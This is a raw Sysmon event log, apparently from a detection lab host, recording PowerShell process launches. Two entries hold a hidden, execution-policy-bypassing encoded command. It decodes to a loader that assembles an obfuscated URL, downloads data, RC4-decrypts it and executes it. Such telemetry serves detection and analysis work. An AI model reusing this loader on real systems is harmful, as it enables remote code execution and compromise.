154100x80000000000000005613964Microsoft-Windows-Sysmon/Operationalar-win-3-2025-03-24 15:11:49.226{e8747bb8-7635-67e1-3964-000000004103}1204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17763.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ep bypas -enc ZgB1AG4AYwB0AGkAbwBuACAAYQBuAGEAbABpAHQAeQBjAGEAbABfAGQAYQB0AGEAKAAkAGQAYQB0AGEAKQAgAHsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAiAGoAaQAzADIAawA3AGEAdQA0AGEAOAAzACIAKQANAAoAIAAgACAAIAAkAGQAYQB0AGEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABhAHQAYQApAA0ACgANAAoAIAAgACAAIAAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEwAZQBuAGcAdABoAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQANAAoAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACgAJgAgACQAUgAgACQAZABhAHQAYQAgACQAawBlAHkAKQApACAAfAAgAGkAZQB4AA0ACgB9AA0ACgANAAoAJABhAHAAaQBfAGsAZQB5ACAAPQAgACIAewAwAH0AewAxAH0AewAxAH0AewAzAH0AewA0AH0AewA1AH0AewA2AH0AewA2AH0AewAyADYAfQB7ADIANQB9AHsAOAB9AHsAMQAxAH0AewAxADIAfQB7ADMAMwB9AHsAMQB9AHsAMAB9AHsANAA1AH0AewAzADIAfQB7ADQANQB9AHsANAB9AHsAMQA3AH0AewAyADYAfQB7ADEAOQB9AHsAMQAzAH0AewAzADgAfQB7ADEAfQB7ADEANwB9AHsAMwA4AH0AewAxAH0AewAxADEAfQB7ADEAOQB9AHsAMQAzAH0AewAyADEAfQB7ADYAfQB7ADEANgB9AHsANQA5AH0AewA4AH0AewA0ADQAfQB7ADMAOAB9AHsAMQAyAH0AewA2AH0AewAxADkAfQB7ADEANwB9AHsANAB9AHsAMAB9AHsAMwAzAH0AewA2AH0AewAyADEAfQB7ADIANQB9AHsAMwAzAH0AewAzADgAfQB7ADYAfQB7ADIANQB9AHsAMQAxAH0AewAxAH0AewA1ADcAfQB7ADEAfQAiAA0ACgAkAHUAcgBsACAAPQAgACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHMAZQBhAHIAYwBoAD8AcQA9AGIAaQB0AGMAbwBpAG4AJQAyADAAJQAyADQAdQBzAGQAJQAyADAAdwBvAHIAdABoACYAeAA9ADEAIgANAAoADQAKACQAdQByAGwAIAA9ACAAJABhAHAAaQBfAGsAZQB5ACAALQBmAEAAKAAkAHUAcgBsACkALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApAA0ACgANAAoAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACQAdQByAGwAKQANAAoAYQBuAGEAbABpAHQAeQBjAGEAbABfAGQAYQB0AGEAIAAkAGQAYQB0AGEAC:\Users\Administrator\Desktop\AR-WIN-3\Administrator{e8747bb8-6cb6-67e1-29a5-040700000000}0x704a5292HighMD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C{e8747bb8-6cb9-67e1-2463-000000004103}5368C:\Windows\explorer.exeC:\Windows\Explorer.EXEAR-WIN-3\Administrator 154100x80000000000000005597245Microsoft-Windows-Sysmon/Operationalar-win-3-2025-03-24 14:49:00.298{e8747bb8-70dc-67e1-a963-000000004103}3852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17763.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Administrator\AR-WIN-3\Administrator{e8747bb8-6cb6-67e1-29a5-040700000000}0x704a5292HighMD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C{e8747bb8-6cb9-67e1-2463-000000004103}5368C:\Windows\explorer.exeC:\Windows\Explorer.EXEAR-WIN-3\Administrator 154100x80000000000000005585441Microsoft-Windows-Sysmon/Operationalar-win-3-2025-03-24 14:34:26.226{e8747bb8-6d72-67e1-4d63-000000004103}5288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17763.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ep bypas -enc ZgB1AG4AYwB0AGkAbwBuACAAYQBuAGEAbABpAHQAeQBjAGEAbABfAGQAYQB0AGEAKAAkAGQAYQB0AGEAKQAgAHsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAiAGoAaQAzADIAawA3AGEAdQA0AGEAOAAzACIAKQANAAoAIAAgACAAIAAkAGQAYQB0AGEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABhAHQAYQApAA0ACgANAAoAIAAgACAAIAAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEwAZQBuAGcAdABoAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQANAAoAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACgAJgAgACQAUgAgACQAZABhAHQAYQAgACQAawBlAHkAKQApACAAfAAgAGkAZQB4AA0ACgB9AA0ACgANAAoAJABhAHAAaQBfAGsAZQB5ACAAPQAgACIAewAwAH0AewAxAH0AewAxAH0AewAzAH0AewA0AH0AewA1AH0AewA2AH0AewA2AH0AewAyADYAfQB7ADIANQB9AHsAOAB9AHsAMQAxAH0AewAxADIAfQB7ADMAMwB9AHsAMQB9AHsAMAB9AHsANAA1AH0AewAzADIAfQB7ADQANQB9AHsANAB9AHsAMQA3AH0AewAyADYAfQB7ADEAOQB9AHsAMQAzAH0AewAzADgAfQB7ADEAfQB7ADEANwB9AHsAMwA4AH0AewAxAH0AewAxADEAfQB7ADEAOQB9AHsAMQAzAH0AewAyADEAfQB7ADYAfQB7ADEANgB9AHsANQA5AH0AewA4AH0AewA0ADQAfQB7ADMAOAB9AHsAMQAyAH0AewA2AH0AewAxADkAfQB7ADEANwB9AHsANAB9AHsAMAB9AHsAMwAzAH0AewA2AH0AewAyADEAfQB7ADIANQB9AHsAMwAzAH0AewAzADgAfQB7ADYAfQB7ADIANQB9AHsAMQAxAH0AewAxAH0AewA1ADcAfQB7ADEAfQAiAA0ACgAkAHUAcgBsACAAPQAgACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHMAZQBhAHIAYwBoAD8AcQA9AGIAaQB0AGMAbwBpAG4AJQAyADAAJQAyADQAdQBzAGQAJQAyADAAdwBvAHIAdABoACYAeAA9ADEAIgANAAoADQAKACQAdQByAGwAIAA9ACAAJABhAHAAaQBfAGsAZQB5ACAALQBmAEAAKAAkAHUAcgBsACkALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApAA0ACgANAAoAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACQAdQByAGwAKQANAAoAYQBuAGEAbABpAHQAeQBjAGEAbABfAGQAYQB0AGEAIAAkAGQAYQB0AGEAC:\Users\Administrator\Desktop\AR-WIN-3\Administrator{e8747bb8-6cb6-67e1-29a5-040700000000}0x704a5292HighMD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C{e8747bb8-6cb9-67e1-2463-000000004103}5368C:\Windows\explorer.exeC:\Windows\Explorer.EXEAR-WIN-3\Administrator